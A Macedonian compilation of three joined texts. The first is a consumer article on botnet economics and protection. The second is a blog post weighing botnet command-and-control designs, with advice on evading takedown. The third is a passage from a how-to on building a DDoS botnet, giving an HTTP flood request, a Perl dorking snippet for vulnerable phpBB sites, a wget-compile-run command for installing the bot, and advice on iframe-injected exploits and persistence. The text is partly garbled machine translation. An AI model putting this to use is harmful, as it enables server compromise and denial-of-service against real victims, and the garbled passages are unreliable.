Денес, ботнетите станаа една од главните алатки на сајбер криминалците. ComputerBild ќе ви каже што се ботнети, како функционираат и како да го спасите вашиот компјутер од паѓање во зомби мрежа.

Ботнет, или зомби мрежа, е мрежа на компјутери заразени со малициозен софтвер што им овозможува на напаѓачите далечински да ги контролираат машините на другите луѓе без знаење на нивните сопственици. Во последниве години, зомби мрежите станаа стабилен извор на приход за сајбер-криминалците. Постојаните ниски трошоци и минимум знаење потребно за управување со ботнети придонесуваат за растот на популарноста, а со тоа и на бројот на ботнети. Напаѓачите и нивните клиенти заработуваат илјадници долари од DDoS напади или спам пораки извршени со помош на зомби мрежи.

Дали мојот компјутер е заразен со бот?

Не е лесно да се одговори на ова прашање. Факт е дека е речиси невозможно да се следат пречките на ботови во секојдневното работење на компјутерот, бидејќи тоа на кој било начин не влијае на перформансите на системот. Сепак, постојат неколку знаци со кои можете да одредите дека има бот во системот:

Непознати програми се обидуваат да се поврзат на Интернет, што периодично огорчено се известува од заштитен ѕид или антивирусен софтвер;

Интернет сообраќајот станува многу висок, иако го користите интернетот многу умерено;

Новите се појавуваат во списокот со системски процеси што се извршуваат, маскирани како редовни процеси на Windows (на пример, бот може да се вика scvhost.exe - ова име е многу слично на името на системскиот процес на Windows svchost.exe; тоа е доста тешко да се забележи разликата, но тоа е можно).

Зошто се создаваат ботнети?

Ботнетовите се создадени за да заработат пари. Постојат неколку области на комерцијално профитабилна употреба на зомби мрежи: DDoS напади, собирање доверливи информации, испраќање спам, фишинг, спам за пребарување, мамење бројачи за кликнување итн. Треба да се напомене дека секоја насока што ќе ја избере напаѓачот ќе биде профитабилна, и Ботнет ви овозможува да ги извршувате сите горенаведени активности истовремено.

DDoS напад (од англискиот дистрибуиран одбивање на услуга) е напад на компјутерски систем, на пример веб-локација, чија цел е да го доведе системот до „пад“, односно состојба во која може да повеќе не прифаќајте и обработувајте барања за легитимни корисници. Еден од најчестите методи за извршување на напад DDoS е испраќање бројни барања до компјутерот или веб-локацијата на жртвата, што доведува до одбивање на услугата доколку ресурсите на нападнатиот компјутер се недоволни за обработка на сите дојдовни барања. DDoS нападите се застрашувачко оружје за хакерите, а ботнетот е идеална алатка за нивно извршување.

DDoS нападите можат да бидат и средство за нелојална конкуренција и акти на сајбер тероризам. Сопственикот на ботнет може да обезбеди услуга на секој не премногу скрупулозен претприемач - да изврши DDoS напад на веб-страницата на неговиот конкурент. По ваквото оптоварување, нападнатиот ресурс ќе „опадне“, напаѓачот ќе добие привремена предност, а сајбер-криминалецот ќе добие скромна (или не многу) награда.

На ист начин, самите сопственици на ботнет можат да користат DDoS напади за да изнудат пари од големи компании. Во исто време, компаниите претпочитаат да се усогласат со барањата на сајбер-криминалците, бидејќи елиминирањето на последиците од успешните DDoS напади е многу скапо. На пример, во јануари 2009 година, еден од најголемите хостери, GoDaddy.com, претрпе DDoS напад, како резултат на кој илјадници сајтови хостирани на неговите сервери беа недостапни речиси еден ден. Финансиските загуби на домаќинот беа огромни.

Во февруари 2007 година, беа извршени серија напади на root DNS сервери, од чие функционирање директно зависи нормалното функционирање на целиот Интернет. Малку е веројатно дека целта на овие напади беше колапс на World Wide Web, бидејќи постоењето на зомби мрежи е можно само доколку Интернетот постои и функционира нормално. Најмногу од сè, тоа беше како демонстрација на моќта и можностите на зомби мрежите.

Рекламите за услугите за напад DDoS отворено се објавуваат на многу релевантни форуми. Цените за напади се движат од 50 до неколку илјади долари дневно континуирано работење на DDoS ботнет. Според веб-страницата www.shadowserver.org, во 2008 година биле извршени околу 190 илјади DDoS напади, од кои сајбер криминалците можеле да заработат околу 20 милиони долари. Нормално, во оваа сума не се вклучени приходите од уцена, што е едноставно невозможно да се пресмета.

Собирање на доверливи информации

Доверливите информации зачувани на компјутерите на корисниците секогаш ќе привлекуваат напаѓачи. Од најголем интерес се броевите на кредитните картички, финансиските информации и лозинките за разни услуги: поштенски сандачиња, FTP сервери, инстант-месинџери итн. само подигнете го на соодветниот модул на компјутер.

Напаѓачите можат или да ги продадат украдените информации или да ги искористат во своја полза. На бројни форуми на Интернет секојдневно се појавуваат стотици огласи за продажба на банкарски сметки. Цената на сметката зависи од износот на пари на сметката на корисникот и се движи од 1 до 1.500 долари по сметка. Долната граница укажува дека во текот на конкуренцијата сајбер-криминалците кои се занимаваат со ваков вид на бизнис се принудени да ги намалат цените. За навистина да заработат многу, им треба стабилен прилив на свежи податоци, а за ова е потребен стабилен раст на зомби мрежите. Финансиските информации се особено интересни за кардерите - криминалци вклучени во фалсификување банкарски картички.

Колку се профитабилни ваквите операции може да се процени по добро познатата приказна за група бразилски сајбер-криминалци кои беа уапсени пред две години. Тие успеале да повлечат 4,74 милиони долари од банкарските сметки на обичните корисници користејќи информации украдени од компјутери. Криминалците кои се вклучени во фалсификување документи, отворање лажни банкарски сметки, правење нелегални трансакции итн., исто така се заинтересирани за стекнување лични податоци кои не се директно поврзани со парите на корисникот.

Друг тип на информации што ги собираат ботнетовите се адресите на е-пошта и, за разлика од броевите на кредитни картички и сметки, многу адреси на е-пошта може да се извлечат од адресарот на еден заразен компјутер. Собраните адреси се ставаат на продажба, понекогаш „на големо“ - по мегабајт. Главните купувачи на таквите „производи“ се спамери. Списокот од милион е-пошта чини од 20 до 100 долари, а пратките нарачани на спамери на истите милион адреси чинат 150-200 долари. Придобивката е очигледна.

Криминалците се заинтересирани и за сметки на различни платени услуги и онлајн продавници. Се разбира, тие се поевтини од банкарските сметки, но нивната имплементација е поврзана со помал ризик од гонење од страна на агенциите за спроведување на законот.

Милиони спам пораки циркулираат низ светот секој ден. Испраќањето на несакана пошта е една од главните функции на модерните ботнети. Според Kaspersky Lab, околу 80% од сите спам се испраќаат преку зомби мрежи. Милијарди писма рекламираат вијагра, копии од скапи часовници, онлајн казина итн. На овој начин, хакерите ги ставаат на ризик компјутерите на невините корисници: адресите од кои се испраќаат пораките завршуваат на црните листи на антивирусни компании.

Во последниве години, опсегот на самите спам услуги се прошири: се појави ICQ спам, спам на социјалните мрежи, форуми и блогови. И ова е исто така „заслуга“ на сопствениците на ботнети: на крајот на краиштата, воопшто не е тешко да се додаде дополнителен модул на клиентот на бот, кој отвора хоризонти за нов бизнис со слогани како „Спам на Фејсбук. Ефтино“. Цените за спам се разликуваат во зависност од целната публика и бројот на адреси на кои се испраќа поштата. Цените за целните пораки се движат од 70 долари за стотици илјади адреси до 1.000 долари за неколку десетици милиони адреси. Во текот на изминатата година, спамерите заработија околу 780 милиони долари од испраќање е-пошта.

Креирање спам за пребарување

Друг случај за употреба на ботнет е да се зголеми популарноста на веб-страниците во пребарувачите. Кога работат на оптимизација на пребарувачите, администраторите на ресурси се обидуваат да ја зголемат позицијата на страницата во резултатите од пребарувањето, бидејќи колку е повисока, толку повеќе посетители ќе доаѓаат на страницата преку пребарувачите и, според тоа, толку е поголем приходот на сопственикот на страницата, на пример, од продажба на рекламен простор на веб-страници. Многу компании им плаќаат на веб-администраторите многу пари за да ја доведат својата веб-страница на првите позиции во пребарувачите. Сопствениците на ботнет искористија некои од нивните техники и го автоматизираа процесот на оптимизација на пребарувачите.

Кога ќе видите во коментарите на вашата објава во LiveJournal или успешна фотографија објавена на страница за хостирање фотографии, многу линкови создадени од личност непозната за вас, а понекогаш и од вашиот „пријател“, немојте да се изненадите: некој само нареди промоција на нивниот ресурс на ботнетот на сопствениците. Специјално креирана програма се презема на зомби компјутер и, во име на неговиот сопственик, остава коментари на популарните ресурси со линкови до страницата што се промовира. Просечната цена за нелегални услуги за пребарување спам е околу 300 долари месечно.

Колку чинат личните податоци?

Цената на украдените лични податоци директно зависи од земјата во која живее нивниот вистински сопственик. На пример, целосните податоци на жител на САД чини 5-8 долари. На црниот пазар особено се вредни податоците на жителите на Европската унија - тие се два до три пати поскапи од податоците на граѓаните на САД и Канада. Ова може да се објасни со фактот дека таквите податоци можат да ги користат криминалците во која било земја на ЕУ. Просечната цена ширум светот за комплетен пакет податоци за едно лице е околу 7 долари.

За жал, за оние кои ќе одлучат да организираат ботнет од нула, нема да биде тешко да најдат инструкции на Интернет за создавање зомби мрежа. Прв чекор: креирајте нова мрежа за зомби. За да го направите ова, треба да ги заразите компјутерите на корисниците со специјална програма - бот. За инфекција, се користат спам пораки, објавување пораки на форуми и социјални мрежи и други техники; Честопати бот е опремен со функција за самопропагирање, како вируси или црви.

Техниките на социјален инженеринг се користат за да се принуди потенцијалната жртва да инсталира бот. На пример, тие нудат да гледаат интересно видео, кое бара преземање специјален кодек. По преземањето и извршувањето на таква датотека, корисникот, се разбира, нема да може да гледа ниту едно видео и најверојатно нема да забележи никакви промени, а неговиот компјутер ќе се зарази и ќе стане послушен слуга, извршувајќи ги сите команди на сопственикот на ботнет.

Вториот широко користен метод на инфекција со бот е преземање преку возење. Кога корисникот посетува заразена веб-страница, злонамерниот код се презема на неговиот компјутер преку разни „дупки“ во апликациите - првенствено во популарните прелистувачи. За да се искористат слабите точки, се користат специјални програми - експлоатирања. Тие ви дозволуваат не само тивко да преземате, туку и тивко да стартувате вирус или бот. Овој тип на дистрибуција на малициозен софтвер е најопасен, бидејќи ако некој популарен ресурс биде хакиран, десетици илјади корисници ќе се заразат!

Ботот може да биде опремен со функција на самопропагирање преку компјутерски мрежи. На пример, може да се шири со инфицирање на сите достапни извршни датотеки или со пребарување и инфицирање на ранливи компјутери на мрежа.

Креаторот на ботнет може да ги контролира заразените компјутери на доверливите корисници користејќи го командниот центар на ботнет, комуницирајќи со ботовите преку IRC канал, веб-врска или преку какви било други достапни средства. Доволно е да се поврзат неколку десетици машини во мрежа за ботнетот да почне да генерира приход за својот сопственик. Покрај тоа, овој приход е линеарно зависен од стабилноста на зомби мрежата и нејзината стапка на раст.

Компаниите за онлајн рекламирање кои работат според шемата PPC (Pay-per-Click) плаќаат пари за уникатни кликови на линкови на реклами објавени на Интернет. За сопствениците на ботнет, измамата на такви компании е профитабилен бизнис. На пример, можете да ја земете добро познатата мрежа на Google AdSense. Огласувачите вклучени во него му плаќаат на Google за кликови на објавените реклами со надеж дека корисникот што ќе се појави ќе купи нешто од нив.

Google, пак, поставува контекстуално рекламирање на различни сајтови кои учествуваат во програмата AdSense, плаќајќи му на сопственикот на страницата процент од секој клик. За жал, не сите сопственици на веб-страници се искрени. Со зомби мрежа, хакерот може да генерира илјадници уникатни кликови дневно, по еден од секоја машина, без да предизвика многу сомнеж кај Google. Така, парите потрошени за рекламната кампања ќе се слеваат во џебот на хакерот. За жал, се уште нема ниту еден случај некој да одговара за ваквите постапки. Според Click Forensics, во 2008 година, околу 16-17% од сите кликови на рекламните линкови биле лажни, од кои најмалку една третина биле генерирани од ботнети. По извршувањето на едноставните пресметки, можете да разберете дека минатата година сопствениците на ботнети „закупиле“ 33.000.000 долари. Добар приход од кликнувања на глувчето!

Напаѓачите и нечесните бизнисмени не мора нужно сами да создадат ботнет од нула. Тие можат да купуваат или изнајмуваат ботнети со различни големини и перформанси од хакери - на пример, со обраќање до специјализирани форуми.

Цената на готовиот ботнет, како и трошоците за негово изнајмување, директно зависи од бројот на компјутери вклучени во него. Готовите ботнети се најпопуларни на форумите на англиски јазик.

Малите ботнети, составени од неколку стотици ботови, чинат помеѓу 200 и 700 долари. Во исто време, просечната цена на еден бот е приближно 50 центи. Поголемите ботнети чинат повеќе пари.

Зомби мрежата Shadow, која пред неколку години ја создаде 19-годишен хакер од Холандија, се состоеше од повеќе од 100 илјади компјутери лоцирани низ светот, а беше продадена за 25.000 евра. За овие пари можете да купите мала куќа во Шпанија, но еден криминалец од Бразил избрал да купи ботнет.

Алатки за заштита на ботнет

1. Пред сè, тоа се антивирусни програми и сеопфатни пакети за заштита од закани на Интернет со редовно ажурирани бази на податоци. Тие ќе помогнат не само да се открие опасноста навреме, туку и да се елиминира пред вашиот верен „железен пријател“, претворен во зомби, да почне да испраќа спам или „испушта“ страници. Сеопфатните пакети, како што е Kaspersky Internet Security 2009, содржат целосен сет на безбедносни функции со кои може да се управува преку заеднички команден центар.

Анти-вирусниот модул ги скенира критичните области на системот во заднина и ги следи сите можни правци на инвазија на вируси: прилози за е-пошта и потенцијално опасни веб-локации.

Заштитниот ѕид ја следи размената на податоци помеѓу персонален компјутер и Интернет. Ги проверува сите пакети со податоци добиени од или испратени на Интернет и, доколку е потребно, ги блокира мрежните напади и спречува приватните податоци тајно да се испраќаат на Интернет.

Филтерот за спам го штити вашето поштенско сандаче од пенетрација на рекламни пораки. Нејзините задачи исто така вклучуваат идентификација на фишинг-мејлови, со помош на кои напаѓачите се обидуваат да извлечат информации од корисникот за неговите ингеренциите за најавување за онлајн плаќање или банкарски системи.

2. Редовни ажурирања на оперативниот систем, веб-прелистувачите и другите апликации, чии развивачи откриваат и елиминираат многу празнини во нивната заштита, како и слабости што ги користат напаѓачите.

3. Специјални програми за шифрирање ќе ги заштитат вашите лични податоци, дури и ако ботот веќе навлегол во компјутерот, бидејќи за да пристапи до него ќе мора да ја пробие лозинката.

4. Здрав разум и претпазливост. Ако сакате да ги заштитите вашите податоци од разни видови закани, не треба да преземате и инсталирате програми од непознато потекло, да отворате архиви со датотеки и покрај предупредувањата за антивирус, да посетувате страници што вашиот прелистувач ги означува како опасни итн.

Им благодариме на Kaspersky Lab за помошта во подготовката на материјалот

Не е за џабе што објавив нацрт на мојата белешка за peer-to-peer мрежи. Коментарите на читателите беа многу корисни. Тие ме инспирираа да работам понатаму во оваа насока. Што излезе од ова - погледнете под сечењето.

Како што сугерира насловот на објавата, денес ќе зборуваме само за ботнети. Ајде да заборавиме на споделувањето датотеки, мрежите за прокси, блоговите од peer-to-peer и валутата p2p за некое време.

Зборот „ботнет“ не треба да се сфати како нешто нелегално. Кога корисникот доброволно презема и инсталира „бот“ за да ги донира своите ресурси за сообраќај и компјутери за потребите на научен проект, ова е исто така ботнет. Според тоа, ботмајсторот не е нужно криминалец. Група од 30 научници вклучени во научен проект е исто така „ботомастер“.

1. Управување со ботнет преку сервер

Најлесен начин за управување со ботови е да стартувате сервер irc/http. Преку него ботовите ќе добиваат команди и со негова помош ќе го испратат резултатот од нивното извршување.

Цртам најдобро што можам :) Во овој случај можеби не е потребна илустрација, но решив да ве подготвам за шокот што ќе го предизвикаат остатокот од цртежите.

• Многу едноставна имплементација, особено во случајот со IRC.
• Брз одговор од ботови.
• Можете да издавате команди на целата мрежа или на одреден бот.
• Ако мрежата се состои од стотици јазли, еден канал во DalNet е доволен за управување со неа. За поголеми мрежи, можете да купите ефтин (околу 300 рубли/месец) веб хостинг.
• Во случај на HTTP-серверот во голема мера го поедноставува развојот на прекрасен интерфејс. Ова е важно ако користиме ботнет во некоја веб-услуга.

• Оптоварување на серверот. Бројот на јазли во најголемите ботнети се мери во милиони. За управување со таква толпа, еден сервер не е доволен.
• Ако нешто се случи со серверот (неуспех на мрежата, DDoS, пожар во центарот за податоци), на мрежата ќе дојде крајот.
• Еден сервер е лесен за заштитен ѕид. Ова може да го направи и давателот и производите на Kaspersky Lab на компјутерот на корисникот.
• Релативно лесно се наоѓа Botmaster. Еднаш заборавив на VPN - чекајте гости во униформа.
• Во случајот со ИВЗ, само онлајн ботови добиваат команди. Ако бот влезе во каналот две минути по испраќањето на командата, тој ќе биде „надвор од темата“.
• Бројот на ботови и нивната IP може да се одреди со одење на каналот IRC. Заштитата на каналот со лозинка нема да помогне, бидејќи второто е лесно да се одбере од кодот на ботот.

2. Контрола преку IRC мрежа

Логичниот чекор за борба против недостатоците на претходниот метод е да се направи не еден сервер, туку неколку. Според мое мислење, најлесниот начин да го направите ова е со подигање на вашата IRC мрежа. Во овој случај, целата одговорност за пренос на податоци помеѓу серверите паѓа на протоколот IRC. На бот страната нема да има разлика во однос на претходното решение.

• Едноставна имплементација, иако ќе треба да се помешате со поставувањето сервери.
• Ботовите сè уште брзо реагираат на командите.
• Сè уште можете да издавате команди на одреден бот.
• Дистрибуција на оптоварување помеѓу серверите, заштита од DDoS и виша сила. Десетина добри сервери можат да бидат доволни за мрежа од милион ботови.
• Ако некои сервери не успеат, можете да имате време да ги замените.
• Ако користите IRCи е збунет од илјада ботови кои седат на еден канал, користат неколку канали. Според тоа, можете да им дадете различни задачи на различни делови од мрежата.

• Ќе треба да издвоите повеќе за сервери/VDS.
• Можете да ги заштитувате сите сервери во исто време и ботмастерот нема да има време да ги замени.
• Ботмајсторот сè уште е прилично лесен за следење.
• Во случајот со ИВЗ, бројот на ботови и нивните IP адреси сè уште се на повидок.
• Ботови кои штотуку влегле на каналот не се во темата.

Терминот доверба прстен првпат го слушнав од мојот пријател Николас во коментарите на претходната објава. Зборуваме за доделување на функцијата „сервери“ на дел од ботнетот.

• Не се потребни сервери.
• Довербата може да се состои од стотици јазли. Не е лесно да се подигне и контролира таков број на irc/http сервери.
• Ботовите не треба постојано да се поврзани со доверба. Доволно е да се проверува еднаш на 5-10 минути за да се види дали се појавиле нови команди. Секоја команда мора да има TTL за време на која се чува во доверба.
• Голем број „сервери“ обезбедуваат отпорност на мрежата на сите видови катастрофи. Кога дел од прстенот ќе умре, ботмастерот може да даде команда за создавање на нова трастринг. Или тоа може да го направат самите прстенести јазли (потребни се дигитални потписи и согласност од одреден процент на доверители).
• Нека довербата се состои од 512 јазли, најмалку 50% се постојано онлајн. Ако има 1.000.000 ботови во мрежата и секој од нив е постојано онлајн, ќе има помалку од 4.000 ботови по доверлив јазол. Кога ботот бара команди (или го испраќа резултатот) еднаш на секои 10 минути, секој прстенест јазол истовремено ќе обработува во просек 7 врски. Сосема малку за мрежа од оваа големина, нели?
• Само botmaster може да добие точна листа на сите ботови.
• Можете да издавате команди на одреден бот или група ботови.
• Брз одговор на ботови на команди.
• Тешко е да се најде Botmaster.

Единствената негатива што ја гледам е сложеноста на имплементацијата.

4. Peer-to-peer мрежи

Според извори на Интернет, P2P ботнетовите во моментов се многу популарни. Меѓу овие извори, тоа заслужува најмногу внимание. Секој јазол во таква мрежа познава само неколку „соседни“ јазли. Botmaster испраќа команди до неколку мрежни јазли, по што се пренесува од сосед на сосед.

Списокот на соседи им се дава на ботови еднаш на посебен сервер. Ова може да биде, на пример, хакирана веб-локација. Серверот не прави ништо друго; тоа е потребно само кога се додаваат јазли во ботнетот.

• Имплементацијата е нешто поедноставна отколку во претходниот став.
• Минимално оптоварување на сите мрежни јазли. Големината на ботнет е практично неограничена.
• Отпорен на DDoS, исклучувања на јазли итн. Речиси е невозможно да се заштитува ботнет p2p.
• Нема постојани врски, како што е случајот со IRC.

• Ни треба сервер, макар и за кратко време.
• Јазлите умираат од време на време, што влијае на поврзувањето на мрежата.
• За да добиете листа на сите ботови, треба, на пример, да им дадете команда за пристап до одредена локација. Во овој случај, не постои гаранција дека само ботмастерот ќе ја добие листата.
• За да издадете команда на одреден јазол, мора или да ја испратите до целата мрежа или директно да се поврзете со јазолот.
• Бавен одговор на ботови на команди.
• За да испратите команда „долга“, на пример, со список на URL-адреси, треба да користите сервер од трета страна, инаку одговорот на ботови ќе се забави уште повеќе.
• Полесно е да се најде ботмастер отколку во претходниот пример, поради употребата на некој вид на сервер.

Се разбира, би можел да грешам, но според мое мислење, ботнетите p2p се многу полоши од довербата. Можеби производителите на антивируси молчат нешто?

5. Целосно решение

Еден начин да се измисли нешто ново и добро е да се вкрсти нешто старо. Комбиниравме телефон, компјутер, магнетофон, камера и видео камера - добивме паметен телефон. Компјутерот и контролата на климата во автомобил веќе нема да изненадат никого. Ајде да залепиме магнет на фрижидерот за секој јогурт и продажбата вртоглаво ќе порасне.

Важно е да се запамети дека ако преминот е неуспешен, можеме да добиеме поединец кој не е добар за ништо. Ме потсетува на генетски алгоритми, нели? Ајде да земеме навидум добра идеја - ботнет p2p, каде што довербата е одговорна за доделување соседи. Тогаш не ни треба никаков сервер!

Но, во овој случај сложеноста на имплементацијата ќе се зголеми, иако малку. Останатите проблеми на ботнетот p2p ќе останат нерешени. Победата е незначителна, резултатот е 1:1.

Откако седнав малку со парче хартија и молив, дојдов до следнава идеја. Колку што знам, никогаш досега не е искажано, а јас сум првиот на ваква идеја. ChSV плус 100.

Што ако мрежата има две состојби - „активна“ и „пасивна“. Во пасивна состојба, ботнетот работи според шемата p2p. Botmaster ја испраќа командата „мобилизирај ги трупите“ и мрежата се претвора во доверба. Во неговата команда, ботмастерот мора да ги посочи доверливите јазли и времето за кое мрежата ја менува својата состојба. За да го направите прстенот поголем, можете да наредите неколку ботови да ги именуваат своите соседи. Понатаму, сите команди се пренесуваат преку доверба. Тој е одговорен и за доделување „соседи“ на нови јазли. Ако TTL на прстенот последователно се покаже дека е недоволен, може да се даде командата „прошири ја активната состојба“.

Таков ботнет нема да наследи ниту една од недостатоците на p2p мрежата и ќе ги има сите предности на доверба, како и следново:

• Зголемена отпорност на DDoS напади и мрежни филтри, како p2p мрежа.
• Минимална потрошувачка на ресурси од ботови за време на прекин на мрежата. Ботмастерот не треба да ја следи состојбата на доверливиот и да избира нови јазли за него.
• Кога креирате доверба, се избираат само оние јазли кои моментално се онлајн. Ботови ќе се поврзат со прстенот при првиот обид (за некое време).
• Списокот на „соседи“ периодично се ажурира. Сепак, целиот ботнет ја знае IP адресата на јазлите вклучени во привремениот прстен. Па нека ги сметаат овие јазли за соседи ако некои од вистинските соседи не се појавиле на мрежата долго време.

И единствениот недостаток што го гледам овде е сложеноста на имплементацијата. Но, ова навистина не е проблем.

6. Работи за паметење

Досега молчев некои точки, бидејќи тие се својствени за кој било од наведените методи за управување со ботнет. Треба да обрнете внимание на нив.

• Некои јазли не можат да прифатат дојдовни врски поради заштитен ѕид или NAT. Во најмала рака, ова треба да се земе предвид кога пишувате бот. На пример, кога дистрибуирате команди во p2p мрежа, самиот бот мора периодично да контактира со своите соседи и да не чека команди од нив.
• Треба да се претпостави дека се слушаат сите команди испратени до мрежата. Најмалку, заинтересираната страна може да го измени кодот на ботот за овие цели. Сепак, има смисла да се шифрира целиот сообраќај испратен на мрежата. Во најмала рака, ова ќе ја комплицира анализата на ботнетот.
• Сите команди на botmaster мора да бидат дигитално потпишани. Лозинките не се добри затоа што може да се пресретнат.
• Бидејќи зборуваме за имплементација, забележувам дека секој ботнет мора да има најмалку три команди - ажурирање на ботови, ажурирање на клучот за ботмастер и самоуништување на целата мрежа.
• Постојат „шпионски“ јазли на мрежата. Некои од нив се вклучени во доверба. Во исто време, не ги знаеме целите што овие „шпиони“ ги следат - ова може да биде идентификување на IP-а на ботмастерот, нарушување на извршувањето на командите, оневозможување на мрежата, стекнување контрола над ботнетот итн. Поточно, ова значи дека ботови мора да изберат случаен јазол кога се поврзуваат со прстен, наместо да го користат истиот цело време.
• На сликата, доверливите јазли се поврзани едни со други, но многу попрактично е да се имплементира прстенот во форма на мала p2p мрежа, односно според принципот „соседи“.

Исто така, ќе забележам дека решенијата 1 и 2 (сервер, многу сервери) губат многу од нивните недостатоци и добиваат неколку предности од решението 3 (трастринг) при користење на протоколот HTTP. Скролувајте низ овие точки повторно за да видите на што мислам.

7. Заклучоци

За мали мрежи, добро решение е да се користи IRC. На пример, ако сакате да креирате сопствена мала мрежа за дистрибуирани компјутери, инсталирајте го ботот на вашиот домашен компјутер, лаптоп, нетбук, работен компјутер (ако политиката на компанијата го дозволува тоа) и управувајте со мрежата преку DalNet. Доколку е потребно, подоцна мрежата може да се „напумпа“ до доверба. Ќе ја дадете соодветната команда, нели?

Ако на ботнетот му треба убав веб-интерфејс, можеби ќе има смисла да се напише дополнителна програма која ќе зема команди од веб-серверот и ќе ги испраќа до IRC. Размислете барем за овој пристап.

Универзалните решенија се доверливи и p2p+trastring. Таквите мрежи ќе работат совршено без разлика колку јазли имаат, 1 или 1.000.000, без никакви сервери.

Поради очигледните недостатоци на чистиот p2p во однос на прстенот, ми останува нејасно зошто се смета за добро решение. Сигурно ботовите што ја сочинуваат мрежата имаат многу корисни функции. Зошто да не додадете уште еден мал товар - мрежна мобилизација во доверба?

Веројатно тоа е сè. Ќе ми биде драго да видам некој од вашите коментари. Особено со критика, укажување на неточности/противречности во текстот и вашите идеи за покренатата тема.

Безбедносните системи постојано се подобруваат, програмерите стануваат поискусни. Сега се прават сè помалку познати грешки.

[пролог]
Интернетот расте со огромна сила. За хакерот станува сè потешко да најде пропусти. Администраторите ги користат најкул експертите за безбедност за да ги заштитат своите производи. Дали ги препознавате вашите мисли? Всушност, Интернетот е полн со пропусти, но тие се од мала корист. Па зависи како гледаш, сега замисли си ја ситуацијата, те измачи некој онлајн копиле, сакаш да го казниш. Денес ќе зборуваме за создавање на свој борбен ботнет.
Значи, што е „бот“. На неупатениот, она што веднаш му паѓа на ум се глупавите противници во компјутерските игри, кои ги застрелате за две минути. Да, ова е делумно точно. Во нашиот случај, „бот“ е програма што ги извршува командите вградени во него. Изгледа ништо посебно. Некој ќе приговори: „Го напишав ова кога имав пет години, притискаш копче и програмата, olla-la, се затвора.“ Да го заборавиме детството. Сите знаеме дека можностите за кодирање се бескрајни, а може да се искористи и за добро и за зло. Се разбира, ние секогаш ги користиме нашите случувања со добри намери. „Ботнет“ е збир на ботови собрани во еден центар кои истовремено ги извршуваат командите на сопственикот. Ботови, патем, главно се насочени кон Windows машините. Овде можете да ги украдете вашите лозинки, да инсталирате sox и да форматирате завртка. Ќе отстапам од правилата и ќе ви кажам како да креирате ботнет од машините nix. Главната функција на нашиот бот е да организира DDOS напади. Ова е идеален начин да ги искористите широките канали на серверите nix. Ајде да направиме математика. Серверот што треба да се „симне“ е на канал од 100 Mb. Односно, 10-20 ботови кои стојат на истиот канал ќе го преплават серверот за миг. Ако можете да се скриете зад заштитен ѕид од еден сервер, тогаш, за жал, нема спас од повеќе ботови

[Напиши бот]
Можете да најдете список на пример бот преку врската на крајот од статијата. Ајде да го погледнеме кодот малку. (Ух, Dream повторно контролира сè преку IRC? Поладно е преку WEB!). Патем, контролата преку IRC беше избрана поради нејзината интерактивност. Да речеме дека сакам да користам локални нуклеарни експлоатирања за да нападнам неколку сервери во ботнет. Едноставно ќе ја извршам командата SH uname -a користејќи го ботот и веднаш ќе го најдам компјутерот што ми треба. Потоа, со извршување на командата во клиентот IRC, ќе ја преземам задна врата и ќе добијам интерактивна школка за понатамошни дејства. Можностите се бескрајни. Ќе речете дека таквата контрола може да се спроведе преку ВЕБ, но зошто повторно да се вчита страницата и да се троши сообраќајот? Многу е поудобно да се набљудува сè во реално време (иако, со ботнет од повеќе од 1000 ботови, можете да се грижите за практичноста на интерфејсот - забелешка за здрав разум). Многу луѓе мислат дека организирањето DDOS е многу тешка работа. Еве пример за типичен код за напад:

GET /server.org HTTP/1.0\r\nПоврзување: Keep-Alive\r\nКориснички агент: Mozilla/4.75 (X11; U; Windows 5.2 i686)\r\nХост: server.org:80\r\nПрифати: слика/гиф, слика/x-xbitmap, слика/jpeg, слика/pjpeg, слика/png, */*\r\nПрифати-кодирање: gzip\r\nПрифати-јазик: en\r\nПрифати-збирка на знаци: iso- 8859-1,*,utf-8\r\n\r\n

Тоа е, ние едноставно испраќаме барање до серверот принудувајќи го да одговори. И ние го испраќаме додека серверот не падне поради недостаток на сообраќај или време на процесорот. Но, дали ќе се ограничите само на nix ботови?Исто така, треба да креирате ботнет на Windows, на пример, базиран на AgoBot. За да го направите ова, можете да креирате некој код за ботот што ќе скенира за lsasl/dcom ранливости на машините што се поврзуваат со серверот на кој е инсталиран ботот.

[Креирање ботнет]
Креирањето ботнет е всушност многу лесно. За да го направите ова, треба да пронајдеме ранливост во која било веб скрипта. Пронајдената ранливост треба да овозможи извршување на команди за преведувач на школка. Кога ќе најдете ранливост, обрнете внимание на името на основната датотека, нејзиниот наслов и името на ранливиот систем. Сега, користејќи ги овие податоци, треба да креирате добро барање за пребарување. На пример, да земеме добро позната ранливост во phpBB<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$sock = IO::Socket::INET->new(PeerAddr=>"search.aol.com",PeerPort=>"80",P ro to=>"tcp") или следно; печати $sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n"; @resu =<$sock>; затвори ($чорап);

Wget http://server.org/bot.c;gcc bot.c -o bash;chmod +x bash;./bash;

Овде можете да видите два проблеми одеднаш. wget и gcc можеби не се достапни или нивната употреба ќе биде забранета. Тука ќе ни помогне fech, curl and get downloads или прелистувачот на конзолата lynx, или можеме да го користиме протоколот ftp. Неговата имплементација е посложена, но предноста е што ftp е насекаде. Што се однесува до компајлерот, можете едноставно да го компајлирате бинарното во вашата школка и да се надевате дека сè ќе биде во ред со компатибилноста, или можете да го преработите ботот на толкувани јазици. - Perl или PHP. Секој метод има свои предности и недостатоци, кој да го користите е ваш избор. Навикнат сум максимално да го користам заробениот сервер. На крајот на краиштата, бот на серверот nix ќе трае само до првото рестартирање на машината. Има еден интересен излез од оваа ситуација. Ботот ќе бара датотеки што можат да се толкуваат (.pl, .php) достапни за пишување и ќе им го додаде кодот за преземање и стартување на ботот. Или можете да креирате друг ботнет на Windows. Ова е исто така лесно да се спроведе. Овде ни треба ранливост во интернет прелистувачот (Internet Explorer, Opera, Mozilla) што води до преземање и стартување на саканата датотека. Следно, се создава запис во инфрајм кој го вчитува нашиот злонамерен код. Овој запис се додава на сите индексни датотеки (или на сите каде што има html код, се зависи од вашата ароганција). Малото сценарио Хаз, кое исто така ќе го најдете во архивата, одлично ја врши оваа работа. Траката за грешки е исполнета со записи за критични пропусти во Internet Explorer, така што ќе имаме и ботнет на Windows системите под наша контрола (погоре ги спомнав неговите предности). Тоа е сè, 